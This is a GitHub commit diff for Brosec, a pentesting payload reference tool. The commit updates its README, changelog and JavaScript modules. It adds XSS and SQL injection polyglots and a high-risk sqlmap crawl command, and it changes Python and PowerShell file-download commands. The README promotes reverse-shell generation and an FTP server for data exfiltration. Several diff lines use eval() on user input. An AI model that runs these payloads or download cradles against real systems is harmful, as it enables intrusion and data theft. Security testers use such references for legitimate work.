Release for v1.1.1

gabemarshall · Jul 30, 2016 · be2a0df · be2a0df
1 parent ddf778a
commit be2a0df
Show file tree

Hide file tree

Showing 9 changed files with 117 additions and 71 deletions.
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -1,29 +1,39 @@
 # ChangeLog
 
-## 1.1.0a _(July 23, 2016)_
+## Major Release 1.1.1 _(July 30, 2016)_
 
+- Features
+  - <strong>Full Windows Support added</strong>
+  - Better documentation added to the new  [wiki](https://github.com/gabemarshall/Brosec/wiki)
+  - Simplified install process. Once you have nodejs installed just run ```npm install -g Brosec```
+  - ```bros encode``` module added (realtime encoder/decoder)
+  - ```bros ftp``` now supports auth via ```--username``` and ```--password``` parameters.
+  - New SQLi Polyglots added to ```bros 43```
+  - New XSS payloads ```bros 42```
+    - (```bros 424``` Credit to [@0xsobky](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot))
 - Dependencies
-  - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```)
+  - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) -- this greatly reduces the complexity of Brosec and makes it easier to install.
 
 
 - Bug fixes
+  - Lots and lots of bug fixes...and probably new bugs introduced ;p
 
-## 0.2b _(Feb 16, 2016)_
+## 1.0.2b _(Feb 16, 2016)_
 
 - Features
     - `bros update`
         - Convenience module that check for updates via git, pull if any updates are found, and installs any new dependencies.
 
 
-## 0.2a _(Feb 15, 2016)_
+## 1.0.2a _(Feb 15, 2016)_
 
 - Features
     - `bros clean`
         - New feature added to allow quick deletion of the local Brosec database.
 
 - Minor performance improvements throughout Brosec
 
-## 0.2 _(Feb 5, 2016)_
+## 1.0.2 _(Feb 5, 2016)_
 
 - Features
     - `bros ftp`

diff --git a/README.md b/README.md
@@ -6,69 +6,53 @@ Overview (tl;dr)
 
 Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.
 
-Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as...
+Assuming the user has already set up the required variables (see the [Getting Started](https://github.com/gabemarshall/Brosec/wiki/Getting-Started) section of the wiki) a reverse shell using the awk command can be generated as easy as...
 
 [![asciicast](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg.png)](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg)
 
-#### Payload Variables
+Or maybe you need to remotely invoke a Powershell script? A download cradle can be generated like so.
 
-Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.
+[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc)
 
-For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).
 
-[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc)
+##### Additional Features and Usage Examples
 
-##### Available variables
 
-- LHOST : Local IP or name
-- LPORT : Local IP or name
-- RHOST : Remote IP or name
-- RPORT : Remote IP or name
-- USER : Username (only used in a few payloads)
-- PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)
+###### [Bros http(s)](https://github.com/gabemarshall/Brosec/wiki/bros-http)
+Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered.
+
+![](http://i.imgur.com/47BHim4.gif)
 
 <br>
+###### [Bros FTP](https://github.com/gabemarshall/Brosec/wiki/bros-ftp)
+Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).
 
-![](http://i.imgur.com/FCateZJ.gif)
-<br>Above are multiple examples of how to access and set the stored configuration variables.
-- Configuration variables can be viewed via the `config` command at any time, or by entering the variable name
-- Variables can be changed at any time by entering `set <variable> <value>`
-- You can also navigate to frequently used payloads by entering the menu sequence from the command line: `bros <sequence>`
-  - Ex: `bros 413` - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload
 
-<br>
+###### [Bros Encode](https://github.com/gabemarshall/Brosec/wiki/bros-encode)
 
-<br>
-##### Additional Features and Usage Examples
-###### XXE for Bros
-![](http://i.imgur.com/hxrqlvk.gif)
-<br>
-In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.
-<br><br>
+A realtime encoder/decoder utility designed with web pentesters in mind that often find the need to encode and decode various payloads.
+
+![](http://i.imgur.com/wxFpA7o.png)
+
+
+Learn about these features and more on the [Brosec wiki](https://github.com/gabemarshall/Brosec/wiki).
 
-###### Simple HTTP(s) Server
-Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered.
 
-![](http://i.imgur.com/47BHim4.gif)
 
-<br>
-###### Anonymous FTP Server
-Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).
 
 Installation
 ============
 
 ### [Releases](https://github.com/gabemarshall/Brosec/releases)
 
-*Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec*
 
-### Manual installation
+### Mac
+
+#### Quick Installation
 
-#### Mac
+- `brew install node` - Install Nodejs (or download installer from https://nodejs.org/en/download/)
+- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin)
 
-- `brew install node` - Install Nodejs
-- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo
-- `cd Brosec && npm install` - cd into the directory and install npm depdendencies
 
 #### Kali Linux
 
@@ -78,22 +62,13 @@ Installation
 
 
 - `n latest` Install latest version of nodejs
-- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo
-- `cd Brosec && npm install` - cd into the directory and install npm depdendencies
+- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin)
 
 ### Windows (Unsupported)
 
-- Install [nodejs](https://nodejs.org/download)
-- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo
-
-
-#### Optional
-Add bros directory path to your PATH env variable, create a symlink for the bros file, etc
-
-Configuration
-=====================
+- Install via official installer [nodejs](https://nodejs.org/download)
+- `npm install -g Brosec` - Install Brosec
 
-Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file.
 
 
 Swag
@@ -113,5 +88,6 @@ Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In additi
 - [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 - [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 - [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html)
+- [SecLists](https://github.com/danielmiessler/SecLists)
 
 Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor)
diff --git a/modules/colorize.js b/modules/colorize.js
@@ -2,22 +2,39 @@ var log = require('cli-color');
 
 exports.samples = function(sample){
 
-    var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/)
+    var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/gi)
     var doesSampleContainRemote = sample.match(/((<(RHOST)\s*?.*?>))/)
     var doesSampleContainRemotePort = sample.match(/((<(RPORT)\s*?.*?>))/)
     var doesSampleContainLocal = sample.match(/((<(LHOST)\s*?.*?>))/)
     var doesSampleContainLocalPort = sample.match(/((<(LPORT)\s*?.*?>))/)
     var doesSampleContainUser = sample.match(/((<(USER)\s*?.*?>))/)
     var doesSampleContainPath = sample.match(/((<(PATH)\s*?.*?>))/)
 
-    function addSomeColor(val, color){
-        var temp = sample.split(val[0])
-        var final = temp[0]+color(val[0])+temp[1]
+    function replaceAll(str, find, replace) {
+      return str.replace(new RegExp(find, 'g'), replace);
+    }
+
+    function addSomeColor(val, color, debug){
+
+          if (val.length > 1){
+            for (b=0;b<val.length;b++){
+                sample = sample.replace(val[b], color(val[b]));
+                sample = replaceAll(sample, val[b], color(val[b]));
+            }
+          } else {
+            sample = sample.replace(val[0], color(val[0]));
+          }
+
+          // sample = replaceAll(sample, val[b], color(val[b]));
+          //var temp1 = sample.split(val[1])
+          //var final = temp1[0]+color(val[1])+temp1[1]
+          var final = sample;
+
         return final;
     }
 
     if (doesSampleContainPrompt){
-        sample = addSomeColor(doesSampleContainPrompt, log.cyan) 
+        sample = addSomeColor(doesSampleContainPrompt, log.cyan, true)
     }
     if (doesSampleContainRemote){
         sample = addSomeColor(doesSampleContainRemote, log.red)
@@ -41,4 +58,4 @@ exports.samples = function(sample){
 
     return sample
 
-}
+}
diff --git a/modules/output.js b/modules/output.js
@@ -35,7 +35,15 @@ exports.prepare = function(payload, lhost, lport, rhost, rport, user, path, call
         if(userResponse){
 
             if(typeof(userResponse) === "string"){
-                payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, userResponse)
+                var t = JSON.parse(userResponse)
+                if (t.length > 1){
+                  for (i=0;i<t.length;i++){
+                      payload = eval("payload.replace(/((<(PROMPT)\\s*?.*?>))/i, t["+i+"])");
+                  }
+                } else {
+                  payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, t[0]);
+                }
+
             } else {
                 tmenu()
                 return

diff --git a/modules/questionUser.js b/modules/questionUser.js
@@ -6,7 +6,7 @@ var prompt = require('prompt'),
     db = require('../db/db'),
     currentOS = os.type(),
     netcat = require('./nc'),
-    finalAnswer
+    finalAnswer = [];
 
 exports.http = function(callback) {
     prompt.message = "Should I fire up a web server for you? (Y/n) :"
@@ -113,7 +113,7 @@ exports.some = function(question, callback, type) {
                 if (err) {
                     console.log(err);
                 } else {
-                    finalAnswer = result._;
+                    finalAnswer.push(result._);
                     temp += 1;
                 }
 
@@ -138,6 +138,7 @@ exports.some = function(question, callback, type) {
                 clearInterval(checkStatus);
                 // If the last question is a string, send output to final parsing
                 if (typeof(question[temp - 1]) === "string") {
+                    finalAnswer = JSON.stringify(finalAnswer);
                     callback(finalAnswer);
                 }
             }

diff --git a/modules/secondaryMenu.js b/modules/secondaryMenu.js
@@ -175,7 +175,7 @@ var Menu = function(title, menuOptions, payloadType) {
 
 var menus = {}
 var infoGMenu = new Menu("--[ Information Gathering ]--", ["DNS", "Port Scanning", "SMB", "SNMP"], pay.infog);
-var webMenu = new Menu("--[ Web ]--",["XML", "SQLi"], pay.web)
+var webMenu = new Menu("--[ Web ]--",["XML", "XSS", "SQLi"], pay.web)
 var miscMenu = new Menu('--[ Miscellaneous ]--', ["Reverse Shells", "Exfiltration"], pay.misc)
 var linuxMenu = new Menu('--[ Linux ]--', ["System Info", "File System", "Networking", "Stealth", "Privesc"], pay.linux)
 var windowsMenu = new Menu('--[ Windows ]--', ["System Info", "File System", "Networking", "WMIC", "Powershell", "Windows Registry"], pay.windows)

diff --git a/payloads/misc.js b/payloads/misc.js
@@ -112,10 +112,11 @@ Load({
 
 Load({
 	title: "Download File via Python",
-	payload:'python -c \'import urllib;urllib.urlretrieve ("http://<LHOST>:<LPORT>/<PROMPT>","<PATH>");\'',
+	payload:'python -c \'import urllib;urllib.urlretrieve ("<PROMPT (URI)>","<PROMPT (local path to save to)>");\'',
 	category: "Exfiltration",
 	callback: function(bro){
-		question("What file would you like to download? (ex: script.sh)");
+		question("What would you like to download? (ex: http://foo.bar/script.sh)");
+		question("Where would you like to save it? (ex: /tmp/script.sh)");
 		ask.some(questions, bro);
 	}
 })

diff --git a/payloads/web.js b/payloads/web.js
@@ -97,30 +97,62 @@ Load({
 	category: "XML"
 })
 
+// ####### XSS ##########
+
+Load({ payload: "'';!--\"<XSS>=&{()}", title: "Test string to see how data is being filtered/escaped.", category: "XSS"})
+Load({ payload: "--></ScRiPt>\">'><ImG/src=\"\"/onerror=\"alert(1)\"/>", title: "XSS Polyglot injecting into HTML", category: "XSS"})
+Load({ payload: "';alert(1)//\';alert(2)//\";alert(3)//\\\";alert(4)//-->\">'>=&{}", title: "XSS Polyglot injecting into JS", category: "XSS"})
+
+// Credit to https://twitter.com/0xsobky
+Load({ payload: "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e", title: "XSS polyglot locator", category: "XSS"})
+
+
 
 // ####### sqlmap #########
 
+Load({ payload: "SLEEP(<PROMPT>) /*' or SLEEP(<PROMPT>) or '\" or SLEEP(<PROMPT>) or \"*/", title: "SQLi Polyglot", category: "SQLi",
+callback: function(bro){
+	question("How many seconds would you like to sleep for?");
+	ask.some(questions, bro);
+}})
+
+// Credit to Detectify https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
+Load({ payload: "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR\"*/", title: "SQLi (MySQL) Polyglot", category: "SQLi"})
+
+
+Load({
+	title: "Use sqlmap to crawl and scan for SQLi",
+	payload: "sqlmap -u '<PROMPT (ex: http://foo.bar)>' --forms --batch --crawl=10 --level=5 --risk=3 --cookie='<PROMPT>'",
+	category: "SQLi",
+	callback: function(bro){
+		question("What URL would you like to scan?");
+		question("What cookies would you like to include?");
+		ask.some(questions, bro);
+	}
+})
+
 Load({
 	title: "Use sqlmap to directly connect to an Oracle db (requires Oracle instant client)",
-	payload: "sqlmap -d 'oracle://<PROMPT (username:password)>@<RHOST>:<RPORT>/<PATH (SID)>'",
+	payload: "sqlmap -d 'oracle://<PROMPT (username:password)>@<RHOST>:<RPORT>/<PROMPT (SID)>'",
 	category: "SQLi",
 	callback: function(bro){
 		question("What DB credentials would you like to use? (Enter as username:password)");
+		question("Whats the SID of the DB? (ex: testdb)");
 		ask.some(questions, bro);
 	}
 })
 
 Load({
 	title: "Use sqlmap to directly connect to a MySQL db",
-	payload: "sqlmap -d 'mysql://<PROMPT (username:password)>@<RHOST>:<RPORT>/<PATH (dbname)>'",
+	payload: "sqlmap -d 'mysql://<PROMPT (username:password)>@<RHOST>:<RPORT>/<PROMPT (dbname)>'",
 	category: "SQLi",
 	callback: function(bro){
 		question("What DB credentials would you like to use? (Enter as username:password)");
+		question("Whats the name of the DB? (ex: testdb)");
 		ask.some(questions, bro);
 	}
 })
 
-// sqlmap -d "mysql://<user>:<password>@<host>:<port>/<dbname>"
 
 /*
 ######################################################

diff --git a/payloads/windows.js b/payloads/windows.js
@@ -157,10 +157,11 @@ Load({
 
 Load({
 	title: "Download File",
-	payload: '(new-object system.net.webclient).downloadFile("<PROMPT (URI)>","<PATH must include name of file>")',
+	payload: '(new-object system.net.webclient).downloadFile("<PROMPT (URI)>","<PROMPT (local path to save to)>")',
 	category: "Powershell",
 	callback: function(bro){
 	    question("What is the full URI path of the hosted file? (ex: http://foo.bar/bro.zip)")
+			question("Where would you like to save it? (ex: C:\\TEMP\\bro.zip)");
 	    ask.some(questions, bro);
 
 	}